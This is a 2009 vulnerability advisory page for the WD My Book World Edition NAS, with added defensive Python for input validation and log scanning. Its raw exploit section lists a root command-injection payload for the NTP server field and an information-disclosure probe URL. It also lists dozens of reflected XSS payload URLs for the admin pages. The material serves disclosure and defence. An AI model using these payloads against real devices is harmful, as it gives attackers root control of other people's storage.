Vendor: My Book World Edition NAS
By: Emanuele 'emgent' Gentili
CVSS: 7.5 (HIGH)
Vulnerability Types: Remote Command Execution, Web Server Default Security Misconfiguration, Information Disclosure, Cross Site Scripting (XSS)
CWE: 79, 200, 522, 79
Product Name: My Book World Edition NAS
Affected Version From: 01.01.16
Affected Version To: 01.01.16
Patch Exists: NO
Related CWE: N/A
CPE: h:wdc:my_book_world_edition_nas
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2009

My Book World Edition NAS multiple vulnerability

My Book World Edition NAS is vulnerable to Remote Command Execution, Web Server Default Security Misconfiguration, Information Disclosure, and Cross Site Scripting (XSS). Remote Command Execution is achieved by entering a malicious command in the NTP TIME SERVER box on the e_datetime.php and system_general.php pages. Because of the Web Server Default Security Misconfiguration, all services and web applications run as root, so a command injected through the web interface executes with root privileges. Information Disclosure is possible by browsing the express.php page, whose unsuppressed XML error reveals the real filesystem path. Cross Site Scripting (XSS) is possible by entering malicious code in the ?lang= parameter of multiple pages.

Mitigation:

Ensure that all services and web applications run with the least privileges necessary. Block access to the express.php page. Validate all user input, including the NTP TIME SERVER field and the ?lang= parameter.
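The "validate all user input" advice, worked through for the two inputs the advisory names. This is an added example and not code from the NAS firmware or the advisory; the affected pages are PHP, so the logic is modelled here in Python to show what the handlers would need to do. The `ntpdate` argv, the supported-language allowlist and all function names are assumptions for illustration.

```python
"""Model of hardened handling for the two inputs abused in the advisory.

Added example, not code from the NAS firmware or the advisory. The ntpdate
argv, the language allowlist and the function names are assumptions.
"""
from __future__ import annotations

import html
import re
import shlex

# One RFC 1123 hostname label: letters, digits and inner hyphens, 1..63 chars.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_hostname(value: str) -> bool:
    """Accept only syntactically valid hostnames (IPv4 literals pass as well).

    Spaces, '&', ';', '|', '/' and quotes never match a label, so the
    advisory's "pool.ntp.org && touch /tmp/pwned.txt" is rejected before
    any command is built.
    """
    if not value or len(value) > 253:
        return False
    labels = value.rstrip(".").split(".")
    return all(_LABEL.match(label) for label in labels)


def build_ntp_command(server: str) -> list[str]:
    """Return the argv for an NTP sync, never a shell string.

    The vulnerable pattern described by the advisory splices the field into
    a shell command line, so "&&" starts a second command. Here the value is
    validated and then passed as a single argv element to
    subprocess.run(argv) with shell=False (the default), so no shell ever
    parses metacharacters in it.
    """
    if not is_valid_hostname(server):
        raise ValueError(f"rejected NTP server value: {server!r}")
    return ["ntpdate", server]  # `ntpdate` is assumed as the sync tool


def legacy_shell_command(server: str) -> str:
    """Fallback when a shell string truly cannot be avoided: quote the value.

    shlex.quote keeps the whole field a single shell word, so "&&" stays
    data. Validation should still run first; quoting is the last line.
    """
    return "ntpdate " + shlex.quote(server)


# Constructed allowlist of the language codes the UI actually ships.
SUPPORTED_LANGS = frozenset({"en", "de", "fr", "it", "es"})


def safe_lang(value: str | None) -> str:
    """Map ?lang= onto a known code; anything else falls back to 'en'."""
    return value if value in SUPPORTED_LANGS else "en"


def encode_for_attribute(value: str) -> str:
    """Encode a value for an HTML attribute context (both quote kinds too)."""
    return html.escape(value, quote=True)


def render_lang_link(lang: str | None) -> str:
    """Emit the self-referencing link the pages build from ?lang=.

    Two independent layers: the allowlist removes attacker-controlled
    content entirely, and attribute encoding would still neutralise it if
    the allowlist were loosened later.
    """
    return (f'<a href="system_general.php?lang='
            f'{encode_for_attribute(safe_lang(lang))}">System</a>')


if __name__ == "__main__":
    payload = "pool.ntp.org && touch /tmp/pwned.txt"
    print(is_valid_hostname("pool.ntp.org"), is_valid_hostname(payload))
    print(legacy_shell_command(payload))
    print(render_lang_link('en"><script>alert(\'XSS\');</script>'))
```

The hostname check does the real work for the NTP field: the original payload only functions because the value reaches a shell unquoted, and a value that can only contain hostname characters cannot carry `&&` or a path. For `lang`, the allowlist alone already defeats the reflected payloads listed in the advisory; the attribute encoding is kept so that a later change to the allowlist does not silently reopen the hole.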

Exploit-DB raw data:

# Exploit Title: My Book World Edition NAS multiple vulnerability
# Date: 20091230
# Author: Emanuele 'emgent' Gentili
# Code: http://www.backtrack.it/~emgent/exploits/20091230-NAS.txt
# Version: 01.01.16 with MioNet 2.3.9.13 firmware.
# CVE : N/A
# Vendor: http://www.wdc.com/mybookworld

[+] REMOTE COMMAND EXECUTION

Pages:
http://10.12.6.111/admin/e_datetime.php?lang=en
http://10.12.6.111/admin/system_general.php?lang=en

Box entry:
NTP TIME SERVER: "pool.ntp.org && touch /tmp/pwned.txt"

Output:
~ # ls -la /tmp/ |grep pwned
-rw-rw-rw-    1 root     root            0 Dec 30 08:25 pwned.txt
~ #


[+] WEB SERVER DEFAULT SECURITY MISCONFIGURATION

All services and web applications run with root privileges, so exploiting a
web application makes it possible to run commands with uid 0 privileges.


[+] INFORMATION DISCLOSURE

Browsing http://10.12.6.111/help/express.php?lang=en%22 makes it possible to see the real path
on the system, via an XML error that is not blocked.


[+] CROSS SITE SCRIPTING (XSS)

A lot of XSS attacks are possible in this web application; every "?lang=" parameter is vulnerable.

http://10.12.6.111/admin/basic_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_config_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_alerts.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_automated.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_firmware_manual.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_general.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_advanced.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_generate_ssl_form.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_lan.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_service.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/network_workgroup_domain.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_disk_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_volume_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_usb_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_quota_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_download_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/system_change_btadmin_passwd.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/storage_share_edit.php?share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/media_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/itune_server_properties.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_manage.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/access_control_shareaccess_edit.php?id=1&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_system.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_cifs.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_ftp.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/status_log_setting.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_shutdown_reboot.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_machine.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_datetime.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_network.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_change_passwd.php?id=2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_mgmt.php?act=del&id=user&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_user_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_mgmt.php?type=share&act=del&share=user&volume=DataVolume&md=md2&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_share_add.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_index.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/e_mionet.php?lang=en"><script>alert('XSS');</script>
http://10.12.6.111/admin/basic_index.php?action=logout&lang=en"><script>alert('XSS');</script>
http://10.12.6.111/help/system.php?lang=en"><script>alert('XSS');</script>&page=system_summary
and others...
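As an added example, not part of the advisory or the vendor's firmware, the following Python scans constructed web-server access-log lines for the two indicators the issues above leave on the server side: a `lang` value that is not a plain language tag, and any request for `/help/express.php`, the page the mitigation says to block. The log lines, the regular expressions and the function names are constructed for this example.

```python
"""Scan constructed web-server access-log lines for the advisory's indicators.

Added example, not part of the advisory. Log lines, patterns and names are
constructed for this example.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample in common log format; the request targets mirror the advisory.
SAMPLE_LOG = """\
10.12.6.50 - - [30/Dec/2009:08:20:01 +0100] "GET /admin/system_general.php?lang=en HTTP/1.1" 200 5120
10.12.6.50 - - [30/Dec/2009:08:21:17 +0100] "GET /admin/basic_index.php?lang=en%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E HTTP/1.1" 200 5301
10.12.6.50 - - [30/Dec/2009:08:22:40 +0100] "GET /help/express.php?lang=en%22 HTTP/1.1" 500 812
10.12.6.50 - - [30/Dec/2009:08:23:05 +0100] "GET /admin/status_index.php?lang=de HTTP/1.1" 200 4880
10.12.6.50 - - [30/Dec/2009:08:24:10 +0100] "POST /admin/e_datetime.php?lang=en HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# A legitimate language tag: "en", "de", optionally with a region ("pt-BR").
LANG_OK = re.compile(r"^[a-z]{2,3}(?:[-_][A-Za-z]{2})?$")
BLOCKED_PATH = "/help/express.php"  # the page the mitigation says to block


def find_indicators(log_text: str) -> list[dict[str, str]]:
    """Return one finding per indicator hit, in log order.

    Rule "bad-lang": the decoded ?lang= value is not a plain language tag,
    which is how both the reflected XSS and the express.php probe appear.
    Rule "express-php": any request for the page that should be blocked.
    The NTP TIME SERVER field travels in a POST body and is not visible in
    an access log; catching it needs application-side logging or input
    validation in the handler itself.
    """
    findings: list[dict[str, str]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        parts = urlsplit(m["target"])
        path = unquote(parts.path)
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        lang = params.get("lang")
        if lang is not None and not LANG_OK.match(lang):
            findings.append({"ip": m["ip"], "ts": m["ts"], "rule": "bad-lang",
                             "path": path, "value": lang})
        if path == BLOCKED_PATH:
            findings.append({"ip": m["ip"], "ts": m["ts"], "rule": "express-php",
                             "path": path, "value": "status " + m["status"]})
    return findings


if __name__ == "__main__":
    for f in find_indicators(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['rule']:<11} {f['path']} {f['value']!r}")
```

Decoding the query string before matching matters: the reflected payloads arrive percent-encoded, so a pattern applied to the raw request line would have to enumerate encodings, whereas an allowlist on the decoded value needs no knowledge of the payload at all. The same decoded-allowlist approach is what a reverse proxy or WAF rule in front of the device would express.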